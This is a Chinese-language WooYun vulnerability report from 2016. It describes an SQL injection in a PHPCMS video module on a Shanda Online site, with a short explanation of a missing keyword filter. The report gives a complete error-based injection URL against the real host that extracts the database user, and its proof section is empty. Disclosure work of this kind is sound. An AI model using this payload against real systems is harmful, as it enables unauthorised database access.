缺陷编号: WooYun-2016-177346
漏洞标题: 盛大在线某站存在SQL注射漏洞(第三方应用)
相关厂商: 盛大在线
漏洞作者: 路人甲
提交时间: 2016-02-21 09:20
公开时间: 2016-03-07 01:11
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 15
漏洞状态: 厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
================================================================================================
详细说明:
证明下 WooYun: PHPCMS某处注入(版本/条件限制) 这个洞的价值
使用phpcms拥有视频功能一般都会中招
code 区域
http://video.sdo.com/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=11&title=12&description=%E9%8C%A6&keywords=,updatexml(1,concat(0x3a,(select%20user())),1),1,1,1,1)%23
这个是老版本的吧 竟然没有
code 区域
str_replace(array('select','from','concat'),'',$data['keywords'])的过滤
漏洞证明: